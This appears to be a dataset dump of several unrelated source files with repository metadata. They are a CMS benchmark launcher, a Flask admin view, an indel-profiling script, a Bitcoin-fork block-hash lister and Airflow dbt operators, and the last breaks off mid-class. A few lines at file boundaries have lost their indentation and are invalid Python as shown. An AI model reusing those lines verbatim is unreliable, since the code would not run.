    :param argv: command-line arguments excluding the program name
                 (i.e. sys.argv[1:]).
    Recognized options: --cpu, --cores, -n/--numevts, --candle, --step,
    --repeat, -h/--help, -d. The results of repetition N are written into a
    directory named RunN.
    """
    # BUGFIX: Popen/subprocess.PIPE were used below but subprocess was never
    # imported, so every launch raised NameError.
    import subprocess
    # Default values:
    # Number of cpu cores on the machine:
    coresOption = "4"
    cores = " --cores=4"
    # Cpu core(s) on which the suite is run:
    cpuOption = (1)  # not necessary to use tuple for single cpu, but for type consistency use ().
    cpu = " --cpu=1"
    # Number of events per test (per candle/per step):
    numevtsOption = "100"
    numevts = " --timesize=100"
    # The default benchmark runs neither igprof nor valgrind:
    igprofevts = " --igprof=0"
    valgrindevts = " --valgrind=0"
    # Default candle option is "" since usually all 7 candles of the suite are run:
    candleOption = ""
    candle = ""
    # Default steps: we don't need to profile all steps of the suite:
    stepOption = "GEN-SIM,DIGI,RECO"
    step = " --step=" + stepOption
    # Default number of repetitions (integer, used directly below):
    repeatOption = 1
    # Parse the command line arguments:
    try:
        opts, args = getopt.getopt(argv, "n:hd", ["cpu=", "cores=", "numevts=", "candle=", "step=", "repeat=", "help"])
    except getopt.GetoptError:
        print("This argument option is not accepted")
        usage()
        sys.exit(2)
    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit()
        elif opt == '-d':
            global _debug
            _debug = 1
        elif opt == "--cpu":
            cpuOption = arg
            cpu = " --cpu=" + cpuOption
        elif opt == "--cores":
            coresOption = arg
        elif opt in ("-n", "--numevts"):
            numevtsOption = arg
            numevts = " --timesize=" + arg
        elif opt == "--candle":
            candleOption = arg
            candle = " --candle=" + arg
        elif opt == "--step":
            stepOption = arg
        elif opt == "--repeat":
            repeatOption = int(arg)
    # Case with no arguments (using defaults):
    if opts == []:
        print("No arguments given, so DEFAULT test will be run:")
    # Print a time stamp at the beginning:
    import time
    date = time.ctime()
    path = os.path.abspath(".")
    print("CMS Benchmarking started running at %s on %s in directory %s, run by user %s" % (date, host, path, user))
    # For the log:
    print("This machine (%s) is assumed to have %s cores, and the suite will be run on cpu(s) %s" % (host, coresOption, cpuOption))
    print("%s events per test will be run" % numevtsOption)
    if candleOption != "":
        print("Running only %s candle, instead of all the candles in the performance suite" % candleOption)
    if stepOption != "":
        print("Profiling only the following steps: %s" % stepOption)
        step = " --step=" + stepOption
    if repeatOption != 1:
        print("The benchmarking will be repeated %s times" % repeatOption)
    # Now let's play!
    for repetition in range(repeatOption):
        run_dir = "Run" + str(repetition + 1)
        mkdircdcmd = "mkdir " + run_dir + ";cd " + run_dir
        # BUGFIX: a space is needed before the redirection, otherwise it glued
        # onto the last option value (e.g. "--step=RECO>& ...").
        PerfSuitecmd = ("cmsPerfSuite.py" + cpu + cores + numevts + igprofevts + valgrindevts
                        + candle + step + " >& cmsPerfSuiteRun" + str(repetition + 1) + ".log")
        launchcmd = mkdircdcmd + ";" + PerfSuitecmd
        print(launchcmd)
        sys.stdout.flush()
        # NOTE(review): ">&" is csh/bash-style redirection; with shell=True the
        # command runs under /bin/sh, where strict POSIX sh may reject it.
        launchcmdstdout = subprocess.Popen(
            launchcmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
        ).stdout.read()
        print(launchcmdstdout)
print(launchcmdstdout)
if __name__ == "__main__":
main(sys.argv[1:])
| 39.804598 | 356 | 0.657956 |
795c5353f5fb88ed8be964d8a4cdba5d5a7df434 | 4,321 | py | Python | app/views/dashboard/leadership/index.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | app/views/dashboard/leadership/index.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | app/views/dashboard/leadership/index.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | import os
from flask import render_template, redirect, url_for, request, current_app
from flask_login import login_required
from app import db, logger
from app.controllers.dashboard_controller import dashboard_controller
from app.forms.dashboard_leaderships import LeadershipsForm, LeadershipsEditForm, LeadershipsEditPhotoForm
from app.models.leaderships import Leaderships
from app.utils.flask_upload_files import UploadFiles, IMAGES
from app.views.dashboard import bp
@bp.route('/leaderships', methods=['GET', 'POST'])
@login_required
@dashboard_controller
def leaderships(**kwargs):
    """Admin view for managing leadership entries (list/create/edit/photo).

    Three separate forms are multiplexed through this single endpoint and are
    told apart by the hidden ``form-id`` POST field:
      '1' -- create a new leadership entry (text fields + photo upload),
      '2' -- edit the text fields of an existing entry,
      '3' -- replace the photo of an existing entry.
    Each branch redirects back to this view with ``action``/``id`` query
    parameters; presumably the template maps those ids to localized
    success/error messages -- TODO confirm against the template.
    """
    form = LeadershipsForm()
    # Uploaded photos are stored under <STATIC_APP>/uploads; only image
    # extensions are accepted (IMAGES whitelist).
    uploader = UploadFiles(basedir=current_app.config.get('STATIC_APP'), storage='uploads', extensions=IMAGES)
    # --- Form 1: create a new leadership entry ---
    if form.validate_on_submit() and request.form['form-id'] == '1':
        try:
            # Usernames must be unique across leadership entries.
            found = db.session.query(Leaderships).filter(Leaderships.username == form.username.data).first()
            if not found:
                filename = uploader.save(file=form.file.data)
                file_url = uploader.get_path(filename=filename)
                new = Leaderships(post=form.post.data,
                                  username=form.username.data,
                                  url=file_url,
                                  phone=form.phone.data,
                                  fax=form.fax.data,
                                  email=form.email.data)
                db.session.add(new)
                db.session.commit()
                return redirect(url_for('dashboard.leaderships', action='success', id=26))
            else:
                # Duplicate username: id=15 error.
                return redirect(url_for('dashboard.leaderships', action='error', id=15))
        except Exception as e:
            # Any failure (upload or DB) rolls the transaction back and is logged.
            db.session.rollback()
            logger.error(e)
            return redirect(url_for('dashboard.leaderships', action='error', id=16))
    form_edit = LeadershipsEditForm()
    # --- Form 2: edit text fields of an existing entry ---
    if form_edit.validate_on_submit() and request.form['form-id'] == '2':
        try:
            leadership_id = int(request.form['leadership-id'])
            # Uniqueness check excludes the record being edited itself.
            found = db.session.query(Leaderships).filter(Leaderships.username == form_edit.username.data, Leaderships.id != leadership_id).first()
            if not found:
                db.session.query(Leaderships).filter(Leaderships.id == leadership_id).update({
                    'post': form_edit.post.data,
                    'username': form_edit.username.data,
                    'phone': form_edit.phone.data,
                    'fax': form_edit.fax.data,
                    'email': form_edit.email.data
                })
                db.session.commit()
                return redirect(url_for('dashboard.leaderships', action='success', id=27))
            else:
                return redirect(url_for('dashboard.leaderships', action='error', id=15))
        except Exception as e:
            db.session.rollback()
            logger.error(e)
            return redirect(url_for('dashboard.leaderships', action='error', id=17))
    form_edit_photo = LeadershipsEditPhotoForm()
    # --- Form 3: replace the photo of an existing entry ---
    if form_edit_photo.validate_on_submit() and request.form['form-id'] == '3':
        try:
            leadership_id = int(request.form['leadership-id'])
            # Save the new file first, then delete the old one from disk.
            filename = uploader.save(file=form_edit_photo.file.data)
            file_url = uploader.get_path(filename=filename)
            old = db.session.query(Leaderships).filter(Leaderships.id == leadership_id).first()
            # NOTE(review): if `old` is None this raises AttributeError, which is
            # caught below and reported as error id=18 -- confirm that is intended.
            if os.path.exists(os.path.join(current_app.config.get('STATIC_APP'), old.url)):
                os.remove(os.path.join(current_app.config.get('STATIC_APP'), old.url))
            db.session.query(Leaderships).filter(Leaderships.id == leadership_id).update({'url': file_url})
            db.session.commit()
            return redirect(url_for('dashboard.leaderships', action='success', id=28))
        except Exception as e:
            db.session.rollback()
            logger.error(e)
            return redirect(url_for('dashboard.leaderships', action='error', id=18))
    # GET (or failed validation): render the page with all entries and forms.
    kwargs['title'] = 'Управление руководителями'
    kwargs['data'] = db.session.query(Leaderships).order_by(Leaderships.id).all()
    kwargs['form'] = form
    kwargs['form_edit'] = form_edit
    kwargs['form_edit_photo'] = form_edit_photo
return render_template("dashboard/leaderships.html", **kwargs) | 50.244186 | 146 | 0.625087 |
795c5487d67b341c74212287fba5cc9ec24a5c06 | 4,747 | py | Python | indel_analysis/endogenous_comparisons/compute_overbeek_indel_profiles.py | kaskamal/SelfTarget | c0bff0f11f4e69bafd80a1fa4d36b0f9689b9af7 | [
"MIT"
] | 20 | 2018-08-27T01:27:02.000Z | 2022-03-07T07:12:56.000Z | indel_analysis/endogenous_comparisons/compute_overbeek_indel_profiles.py | kaskamal/SelfTarget | c0bff0f11f4e69bafd80a1fa4d36b0f9689b9af7 | [
"MIT"
] | 6 | 2019-01-18T19:54:52.000Z | 2021-03-19T23:56:28.000Z | indel_analysis/endogenous_comparisons/compute_overbeek_indel_profiles.py | kaskamal/SelfTarget | c0bff0f11f4e69bafd80a1fa4d36b0f9689b9af7 | [
"MIT"
] | 14 | 2018-10-12T21:31:31.000Z | 2021-11-08T08:32:40.000Z | import io
import sys
from Bio import SeqIO
import os
import numpy as np
import re
import csv
import Bio.Seq
from selftarget.util import getIndelMapExe
sys.path.append('../compute_indels')
from compile_mapped_null_profiles import compileMappedNull, convertToExpFile
from reformat_indel_profile import reformatIndelProfile
def loadFastqReads( filename, id, ftype='fastq'):
	"""Return a dict mapping read ids to sequence strings for every record in the file.

	Read ids that do not already carry a '.'-qualified prefix are prefixed
	with ``id + '.'`` so they match the naming used elsewhere in the pipeline.
	"""
	def qualify(raw_id):
		# Leave already-qualified ids untouched; prefix the bare ones.
		return raw_id if '.' in raw_id else id + '.' + raw_id
	return {qualify(str(rec.id)): str(rec.seq) for rec in SeqIO.parse(filename, ftype)}
def fetchOrigPamAndTemplate(template_file):
	"""Read a single-record template file and return its PAM lookup and sequence.

	The file's first line is a header of the form ``>ID PAM_LOC PAM_DIR``; the
	second line is the template sequence. Returns a tuple
	``({base_id: (pam_loc, pam_dir)}, seq)`` where ``base_id`` is the header id
	truncated at the first underscore.

	Fix: the file handle was previously opened without ever being closed;
	a ``with`` block now guarantees it is released.
	"""
	with io.open(template_file) as f:
		toks = f.readline().split()
		# HACK: eval() parses the PAM location token. It is only ever fed
		# pipeline-generated template files, but do not point this at
		# untrusted input -- eval executes arbitrary expressions.
		id, pam_loc, pam_dir = toks[0][1:], eval(toks[1]), toks[2]
		seq = f.readline()[:-1]
	return {id.split('_')[0]: (pam_loc, pam_dir)}, seq
def filterMappings(mappings_file, output_mappings_file):
	"""Copy a tab-separated mappings file, dropping header and unmapped rows.

	Rows whose first field starts with '@@@' (headers) or whose second field
	is empty (reads with no mapping) are discarded; all other rows are written
	through unchanged.

	Fixes: file handles are now closed even on error (``with``), and rows with
	fewer than two fields (e.g. blank lines) no longer raise IndexError --
	they are skipped like other non-data rows.
	"""
	with io.open(mappings_file) as f, io.open(output_mappings_file, 'w') as fout:
		for toks in csv.reader(f, delimiter='\t'):
			if len(toks) < 2 or toks[0][:3] == '@@@' or toks[1] == '':
				continue
			fout.write(u'\t'.join(toks) + '\n')
def numMismatch(seq1, seq2):
	"""Count the positions at which the two sequences differ (zip-truncated)."""
	return sum(1 for a, b in zip(seq1, seq2) if a != b)
def trimRead( read_seq, template_seq ):
	"""Trim a read down to the span delimited by the template's first and last 20-mers.

	Exact matches of the template's leading/trailing 20 bases are tried first;
	if either is absent, a 10-mer anchor is located instead and accepted when
	the implied 20-base window differs from the template by at most two
	mismatches. Returns '' when either boundary cannot be placed.
	"""
	def mismatches(a, b):
		return sum(1 for x, y in zip(a, b) if x != y)
	def anchored_ok(idx, anchor20):
		# A candidate index is usable when it was found and the 20-base
		# window starting there is within 2 mismatches of the template end.
		return idx >= 0 and mismatches(anchor20, read_seq[idx:idx + 20]) <= 2
	head20 = template_seq[:20]
	tail20 = template_seq[-20:]
	start_idx = read_seq.find(head20)
	stop_idx = read_seq.find(tail20)
	if start_idx < 0:
		# Fall back to the first 10-mer, then the second 10-mer (shifted back).
		start_idx = read_seq.find(template_seq[:10])
		if not anchored_ok(start_idx, head20):
			start_idx = read_seq.find(template_seq[10:20]) - 10
			if not anchored_ok(start_idx, head20):
				start_idx = -1
	if stop_idx < 0:
		# Same two-stage fallback at the template's tail.
		stop_idx = read_seq.find(template_seq[-10:]) - 10
		if not anchored_ok(stop_idx, tail20):
			stop_idx = read_seq.find(template_seq[-20:-10])
			if not anchored_ok(stop_idx, tail20):
				stop_idx = -1
	if start_idx >= 0 and stop_idx >= 0:
		return read_seq[start_idx:stop_idx + 20]
	return ''
def trimReadsToTemplate(fastq_file, output_fasta, template_seq, id):
	"""Trim every read in a FASTQ file to the template span and write FASTA.

	Reads for which trimRead() cannot place both template boundaries are
	dropped. Output records are named ``id.<read_id>``.

	Fixes: the output handle is now closed via ``with`` even if parsing
	raises, and the previously dead ``count``/``total`` counters (incremented
	but never read) were removed.
	"""
	with io.open(output_fasta, 'w') as fout:
		for record in SeqIO.parse(fastq_file, 'fastq'):
			trimmed_seq = trimRead(str(record.seq), template_seq)
			if trimmed_seq != '':
				fout.write(u'>%s\n%s\n' % (id + '.' + str(record.id), trimmed_seq))
def computeOverbeekIndelProfiles(highdir='.', selected_id = None):
	"""Compute indel profiles for the Overbeek samples 1..96.

	For each sample this maps the control ('null') reads against the original
	template, derives expected templates from the null profile, then maps the
	test reads against those expected templates and reformats the result.
	Set `selected_id` (e.g. 'Overbeek7') to process a single sample only.
	Relies on the external indelmap executable (via getIndelMapExe()) and the
	directory layout under `highdir` -- assumes those exist; no checks are made.
	"""
	nulldir = highdir + '/overbeek_control_fastq_files'
	testdir = highdir + '/overbeek_fastq_files'
	for idx in range(1,97):
		id = 'Overbeek%d' % idx
		if selected_id is not None and id != selected_id:
			continue
		fastq_file = testdir + '/%s.fastq' % id
		null_fastq_file = nulldir + '/%s.fastq' % id
		template_file = highdir + '/overbeek_template_files/%s_template.fasta' % id
		null_mappings_file = nulldir + '/%s_mappings.txt' % id
		mapped_file = testdir + '/%s_mappedindels.txt' % id
		#Compute the Null Profile and resulting expected templates
		# NOTE(review): paths are interpolated into a shell command unquoted;
		# safe only because ids/dirs are pipeline-controlled.
		cmd = getIndelMapExe() + ' %s %s %s 0' % (null_fastq_file, template_file, null_mappings_file[:-4] + '_unfilt.txt')
		print(cmd); os.system(cmd)
		filterMappings(null_mappings_file[:-4] + '_unfilt.txt', null_mappings_file)
		null_reads = loadFastqReads(null_fastq_file, id)
		pam_lookup, template_seq = fetchOrigPamAndTemplate(template_file)
		compileMappedNull(nulldir + '/%s' % id, null_reads, pam_lookup, {})
		convertToExpFile(nulldir + '/%s_nullsummary.txt' % id, nulldir + '/%s_exptargets.txt' % id, discard_long=False)
		#Compute the Indel Profile, by mapping the test reads against the null templates
		trimReadsToTemplate(fastq_file, fastq_file[:-6] + '_trimmed.fasta', template_seq, id)
		cmd = getIndelMapExe() + ' %s %s %s 0' % (fastq_file[:-6] + '_trimmed.fasta', nulldir + '/%s_exptargets.txt' % id, mapped_file[:-4] + '_unfilt.txt')
		print(cmd); os.system(cmd)
		filterMappings(mapped_file[:-4] + '_unfilt.txt', mapped_file)
		reads = loadFastqReads(fastq_file[:-6] + '_trimmed.fasta', id, ftype='fasta')
		reformatIndelProfile(testdir + '/%s' % id, reads)
if __name__ == '__main__':
	# Optionally restrict the run to a single Overbeek id passed on the command line.
	selected_id = sys.argv[1] if len(sys.argv) == 2 else None
	computeOverbeekIndelProfiles(selected_id=selected_id)
| 39.890756 | 156 | 0.641668 |
795c551f40c73343609e47d9cdbeef17bf38f4ae | 3,122 | py | Python | contrib/linearize/linearize-hashes.py | bitstakecore/bitstake | 026c006222ca08a7137db7772961f2462ef45d03 | [
"MIT"
] | null | null | null | contrib/linearize/linearize-hashes.py | bitstakecore/bitstake | 026c006222ca08a7137db7772961f2462ef45d03 | [
"MIT"
] | null | null | null | contrib/linearize/linearize-hashes.py | bitstakecore/bitstake | 026c006222ca08a7137db7772961f2462ef45d03 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#
# linearize-hashes.py: List blocks in a linear, no-fork version of the chain.
#
# Copyright (c) 2013-2014 The Bitcoin developers
# Copyright (c) 2015-2018 The PIVX developers
# Copyright (c) 2018 The BS developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from __future__ import print_function
import json
import struct
import re
import base64
import httplib
import sys
settings = {}
class BitcoinRPC:
	"""Minimal JSON-RPC 1.1 client for a bitcoind-compatible node (Python 2 era)."""
	def __init__(self, host, port, username, password):
		# HTTP basic auth header, pre-built once for all requests.
		credentials = "%s:%s" % (username, password)
		self.authhdr = "Basic %s" % (base64.b64encode(credentials))
		# 30-second timeout; strict mode disabled.
		self.conn = httplib.HTTPConnection(host, port, False, 30)
	def execute(self, obj):
		"""POST a request (or batch) object and return the decoded JSON reply, or None."""
		headers = { 'Authorization' : self.authhdr,
			    'Content-type' : 'application/json' }
		self.conn.request('POST', '/', json.dumps(obj), headers)
		resp = self.conn.getresponse()
		if resp is None:
			print("JSON-RPC: no response", file=sys.stderr)
			return None
		return json.loads(resp.read())
	@staticmethod
	def build_request(idx, method, params):
		"""Return a JSON-RPC 1.1 request dict; a None params becomes []."""
		return { 'version' : '1.1',
			 'method' : method,
			 'id' : idx,
			 'params' : [] if params is None else params }
	@staticmethod
	def response_is_error(resp_obj):
		"""True when the reply carries a non-null 'error' member."""
		return 'error' in resp_obj and resp_obj['error'] is not None
def get_block_hashes(settings, max_blocks_per_call=10000):
	"""Print the hash of every block from min_height..max_height, in order.

	getblockhash calls are issued in JSON-RPC batches of at most
	max_blocks_per_call; exits with status 1 on the first RPC error.
	"""
	rpc = BitcoinRPC(settings['host'], settings['port'],
			 settings['rpcuser'], settings['rpcpassword'])
	height = settings['min_height']
	while height < settings['max_height']+1:
		# Size of this batch: remaining heights, capped at the batch limit.
		num_blocks = min(settings['max_height']+1-height, max_blocks_per_call)
		batch = [rpc.build_request(x, 'getblockhash', [height + x])
			 for x in range(num_blocks)]
		reply = rpc.execute(batch)
		for x,resp_obj in enumerate(reply):
			if rpc.response_is_error(resp_obj):
				print('JSON-RPC: error at height', height+x, ': ', resp_obj['error'], file=sys.stderr)
				exit(1)
			assert(resp_obj['id'] == x) # assume replies are in-sequence
			print(resp_obj['result'])
		height += num_blocks
if __name__ == '__main__':
	if len(sys.argv) != 2:
		print("Usage: linearize-hashes.py CONFIG-FILE")
		sys.exit(1)
	# Parse the simple key=value config file, skipping comment lines.
	# `with` guarantees the handle is closed (was open()/close() before).
	with open(sys.argv[1]) as f:
		for line in f:
			# skip comment lines
			m = re.search(r'^\s*#', line)
			if m:
				continue
			# parse key=value lines
			m = re.search(r'^(\w+)\s*=\s*(\S.*)$', line)
			if m is None:
				continue
			settings[m.group(1)] = m.group(2)
	# Fill in defaults for anything the config omitted.
	if 'host' not in settings:
		settings['host'] = '127.0.0.1'
	if 'port' not in settings:
		settings['port'] = 51473
	if 'min_height' not in settings:
		settings['min_height'] = 0
	if 'max_height' not in settings:
		settings['max_height'] = 313000
	if 'rpcuser' not in settings or 'rpcpassword' not in settings:
		# Fixed: was `file=stderr`, a NameError -- only `sys` is imported.
		print("Missing username and/or password in cfg file", file=sys.stderr)
		sys.exit(1)
	# Numeric settings arrive as strings from the config parser.
	settings['port'] = int(settings['port'])
	settings['min_height'] = int(settings['min_height'])
	settings['max_height'] = int(settings['max_height'])
	get_block_hashes(settings)
| 26.913793 | 90 | 0.684497 |
795c55357c48663324c243543889f9db66f71765 | 218 | py | Python | PyOpenWorm/data_trans/__init__.py | jaideep-seth/PyOpenWorm | c36baeda9590334ba810296934973da34f0eab78 | [
"MIT"
] | 1 | 2019-03-22T12:02:36.000Z | 2019-03-22T12:02:36.000Z | PyOpenWorm/data_trans/__init__.py | BioComSoftware/PyOpenWorm | 32084f3570b4ea7fbdb1a4d20bd469d4af6ab28f | [
"MIT"
] | 1 | 2015-05-23T19:26:57.000Z | 2015-05-26T02:04:43.000Z | PyOpenWorm/data_trans/__init__.py | BioComSoftware/PyOpenWorm | 32084f3570b4ea7fbdb1a4d20bd469d4af6ab28f | [
"MIT"
] | 1 | 2015-06-21T17:34:15.000Z | 2015-06-21T17:34:15.000Z | '''
Data translators
Some `DataSource` and `DataTranslator` types. Some deal with generic file types (e.g., comma-separated values) while
others are specific to the format of a kind of file housed in PyOpenWorm.
'''
| 27.25 | 116 | 0.756881 |
795c5537f18a2ffec5aa30a0003494b426a7d62d | 14,182 | py | Python | airflow_dbt_python/operators/dbt.py | apisarenco/airflow-dbt-python | de6ab08408b7acd3f9c6eb5ccbf32df8b1103291 | [
"MIT"
] | null | null | null | airflow_dbt_python/operators/dbt.py | apisarenco/airflow-dbt-python | de6ab08408b7acd3f9c6eb5ccbf32df8b1103291 | [
"MIT"
] | null | null | null | airflow_dbt_python/operators/dbt.py | apisarenco/airflow-dbt-python | de6ab08408b7acd3f9c6eb5ccbf32df8b1103291 | [
"MIT"
] | null | null | null | from __future__ import annotations
import datetime as dt
from dataclasses import asdict, is_dataclass
from pathlib import Path
from tempfile import NamedTemporaryFile, TemporaryDirectory
from typing import Any, Optional, Union
import dbt.flags as flags
from airflow import AirflowException
from airflow.models.baseoperator import BaseOperator
from airflow.models.xcom import XCOM_RETURN_KEY
from airflow.utils.decorators import apply_defaults
from dbt.contracts.results import RunExecutionResult, RunResult, agate
from dbt.logger import log_manager
from dbt.main import initialize_config_values, parse_args, track_run
class DbtBaseOperator(BaseOperator):
    """The base Airflow dbt operator.

    Defines how to build an argument list and execute a dbt command; it does
    not set a command itself -- subclasses must set the ``command`` attribute.

    Attributes:
        command: The dbt command to execute (set by subclasses).
        project_dir: Directory for dbt to look for dbt_profile.yml. Defaults to
            the current directory.
        profiles_dir: Directory for dbt to look for profiles.yml. Defaults to ~/.dbt.
        profile: Which profile to load. Overrides dbt_profile.yml.
        target: Which target to load for the given profile.
        vars: Variables to supply to the project, as a mapping. Overrides
            variables defined in dbt_profile.yml.
        log_cache_events: Flag to enable logging of cache events.
        bypass_cache: Flag to bypass the adapter-level cache of database state.
    """
    command: Optional[str] = None
    # Argument names args_list() serializes into dbt CLI flags; subclasses
    # extend this list with their command-specific flags.
    __dbt_args__ = [
        "project_dir",
        "profiles_dir",
        "profile",
        "target",
        "vars",
        "log_cache_events",
        "bypass_cache",
    ]
    @apply_defaults
    def __init__(
        self,
        project_dir: Optional[Union[str, Path]] = None,
        profiles_dir: Optional[Union[str, Path]] = None,
        profile: Optional[str] = None,
        target: Optional[str] = None,
        vars: Optional[dict[str, str]] = None,
        log_cache_events: Optional[bool] = False,
        bypass_cache: Optional[bool] = False,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        self.project_dir = project_dir
        self.profiles_dir = profiles_dir
        self.profile = profile
        self.target = target
        self.vars = vars
        self.log_cache_events = log_cache_events
        self.bypass_cache = bypass_cache
    def execute(self, context: dict):
        """Execute the dbt command with prepared arguments.

        Raises AirflowException if no command is defined or the dbt run fails.
        Returns the (optionally serialized) dbt result.
        """
        if self.command is None:
            raise AirflowException("dbt command is not defined")
        args: list[Optional[str]] = [self.command]
        args.extend(self.args_list())
        self.log.info("Running dbt %s with args %s", args[0], args[1:])
        with TemporaryDirectory(prefix="airflowtmp") as tmp_dir:
            with NamedTemporaryFile(dir=tmp_dir, mode="w+") as f:
                with log_manager.applicationbound():
                    log_manager.reset_handlers()
                    log_manager.set_path(tmp_dir)
                    # dbt logger writes to STDOUT and I haven't found a way
                    # to bubble up to the Airflow command logger. As a workaround,
                    # I set the output stream to a temporary file that is later
                    # read and logged using the command's logger.
                    log_manager.set_output_stream(f)
                    res, success = self.run_dbt_command(args)
                with open(f.name) as read_file:
                    for line in read_file:
                        self.log.info(line.rstrip())
        if self.do_xcom_push is True:
            # Some dbt operations use dataclasses for their results, found in
            # dbt.contracts.results. serializable_result turns them into
            # JSON-friendly dicts for the default XCom backend.
            res = self.serializable_result(res)
        if success is not True:
            # Push the (possibly partial) result before failing so it is
            # available for inspection even on failed runs.
            if self.do_xcom_push is True and context.get("ti", None) is not None:
                self.xcom_push(context, key=XCOM_RETURN_KEY, value=res)
            raise AirflowException(f"dbt {args[0]} {args[1:]} failed")
        return res
    def args_list(self) -> list[str]:
        """Build the list of CLI arguments to pass to dbt from __dbt_args__."""
        args = []
        for arg in self.__dbt_args__:
            value = getattr(self, arg, None)
            if value is None:
                continue
            if arg.startswith("dbt_"):
                # Attribute names prefixed with dbt_ avoid clashes with
                # BaseOperator attributes; strip the prefix for the flag.
                arg = arg[4:]
            if not isinstance(value, bool) or value is True:
                flag = "--" + arg.replace("_", "-")
                args.append(flag)
            if isinstance(value, bool):
                continue
            elif any(isinstance(value, _type) for _type in (str, Path, int)):
                args.append(str(value))
            elif isinstance(value, list):
                args.extend(value)
            elif isinstance(value, dict):
                # dbt expects dict-valued flags (e.g. --vars) as a YAML string.
                yaml_str = (
                    "{"
                    + ",".join("{}: {}".format(k, v) for k, v in value.items())
                    + "}"
                )
                args.append(yaml_str)
        return args
    def run_dbt_command(self, args: list[Optional[str]]) -> tuple[RunResult, bool]:
        """Parse the argument list and run the corresponding dbt task.

        Returns a (results, success) tuple as produced by dbt itself.
        """
        try:
            parsed = parse_args(args)
        except Exception as exc:
            # Fixed: the message was a plain string missing the f-prefix,
            # so {args} was never interpolated.
            raise AirflowException(f"Failed to parse dbt arguments: {args}") from exc
        initialize_config_values(parsed)
        flags.set_from_args(parsed)
        parsed.cls.pre_init_hook(parsed)
        command = parsed.cls.from_args(args=parsed)
        results = None
        with track_run(command):
            results = command.run()
        success = command.interpret_results(results)
        return results, success
    def serializable_result(
        self, result: Optional[RunExecutionResult]
    ) -> Optional[dict[Any, Any]]:
        """
        Turn dbt's RunExecutionResult into a dict of only JSON-serializable types.

        Each subclass may override this to return a dictionary of
        JSON-serializable types, the default XCom backend. If implementing
        custom XCom backends, this method may be overridden.
        """
        if result is None or is_dataclass(result) is False:
            return result
        return asdict(result, dict_factory=run_result_factory)
class DbtRunOperator(DbtBaseOperator):
    """Runs the ``dbt run`` command.

    Each constructor argument maps 1:1 to a ``dbt run`` flag; arguments left
    as None are omitted from the generated command line by args_list().
    """
    command = "run"
    # Command-specific flags, appended to the base operator's flag list.
    __dbt_args__ = DbtBaseOperator.__dbt_args__ + [
        "full_refresh",
        "models",
        "fail_fast",
        "threads",
        "exclude",
        "selector",
        "state",
        "defer",
        "no_defer",
    ]
    def __init__(
        self,
        full_refresh: Optional[bool] = None,
        models: Optional[list[str]] = None,
        fail_fast: Optional[bool] = None,
        threads: Optional[int] = None,
        exclude: Optional[list[str]] = None,
        selector: Optional[str] = None,
        state: Optional[Union[str, Path]] = None,
        defer: Optional[bool] = None,
        no_defer: Optional[bool] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        # Attach every dbt-specific argument under its own name so that
        # args_list() can discover it through __dbt_args__.
        for attr, value in (
            ("full_refresh", full_refresh),
            ("models", models),
            ("fail_fast", fail_fast),
            ("threads", threads),
            ("exclude", exclude),
            ("selector", selector),
            ("state", state),
            ("defer", defer),
            ("no_defer", no_defer),
        ):
            setattr(self, attr, value)
class DbtSeedOperator(DbtBaseOperator):
    """Runs the ``dbt seed`` command.

    Arguments mirror the ``dbt seed`` CLI flags; None values are omitted from
    the generated command line by args_list().
    """
    command = "seed"
    # Command-specific flags, appended to the base operator's flag list.
    __dbt_args__ = DbtBaseOperator.__dbt_args__ + [
        "full_refresh",
        "select",
        "show",
        "threads",
        "exclude",
        "selector",
        "state",
    ]
    def __init__(
        self,
        full_refresh: Optional[bool] = None,
        select: Optional[list[str]] = None,
        show: Optional[bool] = None,
        threads: Optional[int] = None,
        exclude: Optional[list[str]] = None,
        selector: Optional[str] = None,
        state: Optional[Union[str, Path]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        # Attach each dbt-specific argument so args_list() can pick it up.
        for attr, value in (
            ("full_refresh", full_refresh),
            ("select", select),
            ("show", show),
            ("threads", threads),
            ("exclude", exclude),
            ("selector", selector),
            ("state", state),
        ):
            setattr(self, attr, value)
class DbtTestOperator(DbtBaseOperator):
    """Runs the ``dbt test`` command.

    Arguments mirror the ``dbt test`` CLI flags; None values are omitted from
    the generated command line by args_list().
    """
    command = "test"
    # Command-specific flags, appended to the base operator's flag list.
    __dbt_args__ = DbtBaseOperator.__dbt_args__ + [
        "data",
        "schema",
        "fail_fast",
        "models",
        "threads",
        "exclude",
        "selector",
        "state",
        "defer",
        "no_defer",
    ]
    def __init__(
        self,
        data: Optional[bool] = None,
        schema: Optional[bool] = None,
        models: Optional[list[str]] = None,
        fail_fast: Optional[bool] = None,
        threads: Optional[int] = None,
        exclude: Optional[list[str]] = None,
        selector: Optional[str] = None,
        state: Optional[Union[str, Path]] = None,
        defer: Optional[bool] = None,
        no_defer: Optional[bool] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        # Attach each dbt-specific argument so args_list() can pick it up.
        for attr, value in (
            ("data", data),
            ("schema", schema),
            ("models", models),
            ("fail_fast", fail_fast),
            ("threads", threads),
            ("exclude", exclude),
            ("selector", selector),
            ("state", state),
            ("defer", defer),
            ("no_defer", no_defer),
        ):
            setattr(self, attr, value)
class DbtCompileOperator(DbtBaseOperator):
    """Runs the ``dbt compile`` command.

    Arguments mirror the ``dbt compile`` CLI flags; None values are omitted
    from the generated command line by args_list().
    """
    command = "compile"
    # Command-specific flags, appended to the base operator's flag list.
    __dbt_args__ = DbtBaseOperator.__dbt_args__ + [
        "parse_only",
        "full_refresh",
        "fail_fast",
        "threads",
        "models",
        "exclude",
        "selector",
        "state",
    ]
    def __init__(
        self,
        parse_only: Optional[bool] = None,
        full_refresh: Optional[bool] = None,
        models: Optional[list[str]] = None,
        fail_fast: Optional[bool] = None,
        threads: Optional[int] = None,
        exclude: Optional[list[str]] = None,
        selector: Optional[str] = None,
        state: Optional[Union[str, Path]] = None,
        **kwargs,
    ) -> None:
